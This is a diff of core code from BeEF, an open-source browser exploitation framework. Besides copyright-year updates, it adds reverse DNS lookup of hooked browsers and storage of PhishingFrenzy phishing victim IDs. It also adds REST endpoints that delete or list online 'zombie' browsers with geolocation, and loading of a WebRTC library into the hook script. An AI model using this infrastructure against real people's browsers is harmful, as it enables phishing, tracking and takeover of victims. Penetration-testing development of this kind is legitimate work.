+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/console/banners.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/console/commandline.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -18,6 +18,7 @@ module BeEF
         @options[:ext_config] = ""
         @options[:port] = ""
         @options[:ws_port] = ""
+        @options[:interactive] = false
 
 
         @already_parsed = false
@@ -54,6 +55,10 @@ module BeEF
               opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
                 @options[:ws_port] = ws_port
               end
+
+              opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
+                @options[:interactive] = true
+              end
             end
 
             optparse.parse!

core/main/constants/browsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/distributedengine.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/hardware.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/os.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/crypto.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -39,6 +39,23 @@ module Core
       config.set('beef.api_token', token)
       token
     end
+
+    # Generates a unique identifier for DNS rules.
+    #
+    # @return [String] 8-character hex identifier
+    def self.dns_rule_id
+      id = nil
+      length = 4
+
+      begin
+        id = OpenSSL::Random.random_bytes(length).unpack('H*')[0]
+        BeEF::Core::Models::Dns::Rule.each { |rule| throw StandardError if id == rule.id }
+      rescue StandardError
+        retry
+      end
+
+      id.to_s
+    end
   
   end
 end

core/main/distributed_engine/models/rules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -38,10 +38,17 @@ module BeEF
           zombie.firstseen = Time.new.to_i
 
           # hostname
+          log_zombie_port = 0
           if not @data['results']['HostName'].nil? then
             log_zombie_domain=@data['results']['HostName']
           elsif (not @data['request'].referer.nil?) and (not @data['request'].referer.empty?)
-            log_zombie_domain=@data['request'].referer.gsub('http://', '').gsub('https://', '').split('/')[0]
+            referer = @data['request'].referer
+            if referer.start_with?("https://") then
+              log_zombie_port = 443
+            else
+              log_zombie_port = 80
+            end
+            log_zombie_domain=referer.gsub('http://', '').gsub('https://', '').split('/')[0]
           else
             log_zombie_domain="unknown" # Probably local file open
           end
@@ -51,7 +58,6 @@ module BeEF
             log_zombie_port=@data['results']['HostPort']
           else
             log_zombie_domain_parts=log_zombie_domain.split(':')
-            log_zombie_port=80
             if log_zombie_domain_parts.length > 1 then
               log_zombie_port=log_zombie_domain_parts[1].to_i
             end
@@ -62,10 +68,10 @@ module BeEF
 
           #Parse http_headers. Unfortunately Rack doesn't provide a util-method to get them :(
           @http_headers = Hash.new
-          http_header = @data['request'].env.select {|k,v| k.to_s.start_with? 'HTTP_'}
-                      .each {|key,value|
-                            @http_headers[key.sub(/^HTTP_/, '')] = value
-                      }
+          http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }
+          .each { |key, value|
+            @http_headers[key.sub(/^HTTP_/, '')] = value
+          }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
           #print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}"
@@ -80,6 +86,21 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # lookup zombie host name
+          ip_str = zombie.ip
+          if config.get('beef.dns_hostname_lookup')
+            begin
+              require 'resolv'
+              host_name = Resolv.getname(zombie.ip).to_s
+              if BeEF::Filters.is_valid_hostname?(host_name)
+                ip_str += " [#{host_name}]"
+              end
+            rescue
+              print_debug "[INIT] Reverse lookup failed - No results for IP address '#{zombie.ip}'"
+            end
+          end
+          BD.set(session_id, 'IP', ip_str)
+
           # geolocation
           if config.get('beef.geoip.enable')
             require 'geoip'
@@ -91,37 +112,37 @@ module BeEF
               else
                 #print_debug "[INIT] Geolocation results: #{geoip}"
                 BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}")
-                BD.set(session_id, 'LocationCity',          "#{geoip['city_name']}")
-                BD.set(session_id, 'LocationCountry',       "#{geoip['country_name']}")
-                BD.set(session_id, 'LocationCountryCode2',  "#{geoip['country_code2']}")
-                BD.set(session_id, 'LocationCountryCode3',  "#{geoip['country_code3']}")
+                BD.set(session_id, 'LocationCity', "#{geoip['city_name']}")
+                BD.set(session_id, 'LocationCountry', "#{geoip['country_name']}")
+                BD.set(session_id, 'LocationCountryCode2', "#{geoip['country_code2']}")
+                BD.set(session_id, 'LocationCountryCode3', "#{geoip['country_code3']}")
                 BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}")
-                BD.set(session_id, 'LocationPostCode',      "#{geoip['postal_code']}")
-                BD.set(session_id, 'LocationLatitude',      "#{geoip['latitude']}")
-                BD.set(session_id, 'LocationLongitude',     "#{geoip['longitude']}")
-                BD.set(session_id, 'LocationDMACode',       "#{geoip['dma_code']}")
-                BD.set(session_id, 'LocationAreaCode',      "#{geoip['area_code']}")
-                BD.set(session_id, 'LocationTimezone',      "#{geoip['timezone']}")
-                BD.set(session_id, 'LocationRegionName',    "#{geoip['real_region_name']}")
+                BD.set(session_id, 'LocationPostCode', "#{geoip['postal_code']}")
+                BD.set(session_id, 'LocationLatitude', "#{geoip['latitude']}")
+                BD.set(session_id, 'LocationLongitude', "#{geoip['longitude']}")
+                BD.set(session_id, 'LocationDMACode', "#{geoip['dma_code']}")
+                BD.set(session_id, 'LocationAreaCode', "#{geoip['area_code']}")
+                BD.set(session_id, 'LocationTimezone', "#{geoip['timezone']}")
+                BD.set(session_id, 'LocationRegionName', "#{geoip['real_region_name']}")
               end
             else
               print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'"
-              print_more  "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
+              print_more "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
             end
           end
 
           # detect browser proxy
           using_proxy = false
           [
-            'CLIENT_IP',
-            'FORWARDED_FOR',
-            'FORWARDED',
-            'FORWARDED_FOR_IP',
-            'PROXY_CONNECTION',
-            'PROXY_AUTHENTICATE',
-            'X_FORWARDED',
-            'X_FORWARDED_FOR',
-            'VIA'
+              'CLIENT_IP',
+              'FORWARDED_FOR',
+              'FORWARDED',
+              'FORWARDED_FOR_IP',
+              'PROXY_CONNECTION',
+              'PROXY_AUTHENTICATE',
+              'X_FORWARDED',
+              'X_FORWARDED_FOR',
+              'VIA'
           ].each do |header|
             unless JSON.parse(zombie.httpheaders)[header].nil?
               using_proxy = true
@@ -132,12 +153,12 @@ module BeEF
           # retrieve proxy client IP
           proxy_clients = []
           [
-            'CLIENT_IP',
-            'FORWARDED_FOR',
-            'FORWARDED',
-            'FORWARDED_FOR_IP',
-            'X_FORWARDED',
-            'X_FORWARDED_FOR'
+              'CLIENT_IP',
+              'FORWARDED_FOR',
+              'FORWARDED',
+              'FORWARDED_FOR_IP',
+              'X_FORWARDED',
+              'X_FORWARDED_FOR'
           ].each do |header|
             proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
           end
@@ -290,10 +311,10 @@ module BeEF
 
           # get and store the yes|no value for browser components
           components = [
-            'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
-            'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
-            'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
-            'hasSessionCookies', 'hasPersistentCookies'
+              'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
+              'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
+              'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
+              'hasSessionCookies', 'hasPersistentCookies'
           ]
           components.each do |k|
             v = get_param(@data['results'], k)
@@ -345,6 +366,16 @@ module BeEF
               print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
             end
           end
+
+          if config.get('beef.integration.phishing_frenzy.enable')
+            # get and store the browser plugins
+            victim_uid = get_param(@data['results'], 'PhishingFrenzyUID')
+            if BeEF::Filters.alphanums_only?(victim_uid)
+              BD.set(session_id, 'PhishingFrenzyUID', victim_uid)
+            else
+              self.err_msg "Invalid PhishingFrenzy Victim UID returned from the hook browser's initial connection."
+            end
+          end
         end
 
         def get_param(query, key)

core/main/handlers/commands.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/modules/beefjs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
+            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js lib/webrtcadapter.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -29,6 +29,10 @@ module BeEF
             if config.get("beef.http.websocket.enable") == true
               beef_js_sub_files << "websocket.js"
             end
+            # @note Load webrtc library only if WebRTC extension is enabled
+            if config.get("beef.extension.webrtc.enable") == true
+              beef_js_sub_files << "webrtc.js"
+            end
 
             # @note antisnatchor: leave timeout.js as the last one!
             beef_js_sub_files << "timeout.js"
@@ -38,7 +42,7 @@ module BeEF
 
             # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
             # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
-            ext_js_sub_files.each{ |ext_js_sub_file|
+            ext_js_sub_files.each { |ext_js_sub_file|
               if config.get("beef.extension.evasion.enable")
                 if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
                   print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
@@ -103,6 +107,11 @@ module BeEF
               hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
             end
 
+            # @note Set if PhishingFrenzy integration is enabled
+            if config.get("beef.integration.phishing_frenzy.enable")
+              hook_session_config['phishing_frenzy_enable'] = config.get("beef.integration.phishing_frenzy.enable")
+            end
+
             # @note populate place holders in the beef_js string and set the response body
             eruby = Erubis::FastEruby.new(beef_js)
             @hook = eruby.evaluate(hook_session_config)

core/main/handlers/modules/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -53,7 +53,7 @@ module BeEF
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
               #//
-              #//   Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
               #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
               #//   See the file 'doc/COPYING' for copying permission
               #//

core/main/logger.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/hookedbrowser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/log.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/optioncache.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/result.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/user.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/raw.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/redirector.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/websocket/websocket.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/admin.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/categories.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -43,6 +43,68 @@ module BeEF
           output.to_json
         end
 
+	get '/:session/delete' do
+          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
+          error 401 unless hb != nil
+
+          details = BeEF::Core::Models::BrowserDetails.all(:session_id => hb.session)
+	  details.destroy
+
+	  logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
+	  logs.destroy
+
+	  commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hb.id)
+	  commands.destroy
+
+	  results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id)
+	  results.destroy
+
+	  begin
+	    requester = BeEF::Core::Models::Http.all(:hooked_browser_id => hb.id)
+	    requester.destroy
+	  rescue => e
+	    #the requester module may not be enabled
+	  end
+
+	  begin
+	    xssraysscans = BeEF::Core::Models::Xssraysscan.all(:hooked_browser_id => hb.id)
+	    xssraysscans.destroy
+
+	    xssraysdetails = BeEF::Core::Models::Xssraysdetail.all(:hooked_browser_id => hb.id)
+	    xssraysdetails.destroy
+	  rescue => e
+	    #the xssraysscan module may not be enabled
+	  end
+
+	  hb.destroy
+	end
+
+        #
+        # @note this is basically the same call as /api/hooks, but returns different data structured in arrays rather than objects.
+        # Useful if you need to query the API via jQuery.dataTable < 1.10 which is currently used in PhishingFrenzy
+        #
+        get '/pf/online' do
+          online_hooks = hbs_to_array(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
+
+          output = {
+              'aaData' => online_hooks
+          }
+          output.to_json
+        end
+
+        #
+        # @note this is basically the same call as /api/hooks, but returns different data structured in arrays rather than objects.
+        # Useful if you need to query the API via jQuery.dataTable < 1.10 which is currently used in PhishingFrenzy
+        #
+        get '/pf/offline' do
+          offline_hooks = hbs_to_array(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
+
+          output = {
+              'aaData' => offline_hooks
+          }
+          output.to_json
+        end
+
         #
         # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
         #
@@ -69,20 +131,45 @@ module BeEF
         end
 
         def get_hb_details(hb)
-           details = BeEF::Core::Models::BrowserDetails
+          details = BeEF::Core::Models::BrowserDetails
 
-           {
-               'id'       => hb.id,
-               'session'  => hb.session,
-               'name'     => details.get(hb.session, 'BrowserName'),
-               'version'  => details.get(hb.session, 'BrowserVersion'),
-               'os'       => details.get(hb.session, 'OsName'),
-               'platform' => details.get(hb.session, 'BrowserPlatform'),
-               'ip'       => hb.ip,
-               'domain'   => details.get(hb.session, 'HostName'),
-               'port'     => hb.port.to_s,
-               'page_uri' => details.get(hb.session, 'PageURI')
-           }
+          {
+              'id' => hb.id,
+              'session' => hb.session,
+              'name' => details.get(hb.session, 'BrowserName'),
+              'version' => details.get(hb.session, 'BrowserVersion'),
+              'os' => details.get(hb.session, 'OsName'),
+              'platform' => details.get(hb.session, 'BrowserPlatform'),
+              'ip' => hb.ip,
+              'domain' => details.get(hb.session, 'HostName'),
+              'port' => hb.port.to_s,
+              'page_uri' => details.get(hb.session, 'PageURI')
+          }
+        end
+
+        # this is used in the 'get '/pf'' restful api call
+        def hbs_to_array(hbs)
+          hbs_online = []
+          hbs.each do |hb|
+            details = BeEF::Core::Models::BrowserDetails
+            # TODO jQuery.dataTables needs fixed array indexes, add emptry string if a value is blank
+            hbs_online << [
+                hb.id,
+                hb.ip,
+                details.get(hb.session, 'PhishingFrenzyUID'),
+                details.get(hb.session, 'BrowserName'),
+                details.get(hb.session, 'BrowserVersion'),
+                details.get(hb.session, 'OsName'),
+                details.get(hb.session, 'BrowserPlatform'),
+                details.get(hb.session, 'BrowserLanguage'),
+                details.get(hb.session, 'BrowserPlugins'),
+                details.get(hb.session, 'LocationCity'),
+                details.get(hb.session, 'LocationCountry'),
+                details.get(hb.session, 'LocationLatitude'),
+                details.get(hb.session, 'LocationLongitude')
+            ]
+          end
+          hbs_online
         end
 
       end

core/main/rest/handlers/logs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -35,7 +35,11 @@ module BeEF
             error 400
           end
         end
+
+        get '/version' do
+          { 'version' => config.get('beef.version') }.to_json
+        end
       end
     end
   end
-end
+end

core/main/router/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/router/router.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -109,13 +109,13 @@ module BeEF
 
           if @configuration.get('beef.http.https.enable') == true
             openssl_version = OpenSSL::OPENSSL_VERSION
-            if openssl_version =~ / 1\.0\.1([a-f])/
+            if openssl_version =~ / 1\.0\.1([a-f])? /
               print_warning "Warning: #{openssl_version} is vulnerable to Heartbleed (CVE-2014-0160)."
               print_more "Upgrade OpenSSL to version 1.0.1g or newer."
             end
             @http_server.ssl = true
-            @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'),
-                                      :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'),
+            @http_server.ssl_options = {:private_key_file => File.expand_path(@configuration.get('beef.http.https.key'), $root_dir),
+                                      :cert_chain_file => File.expand_path(@configuration.get('beef.http.https.cert'), $root_dir),
                                       :verify_peer => false}
           end
         end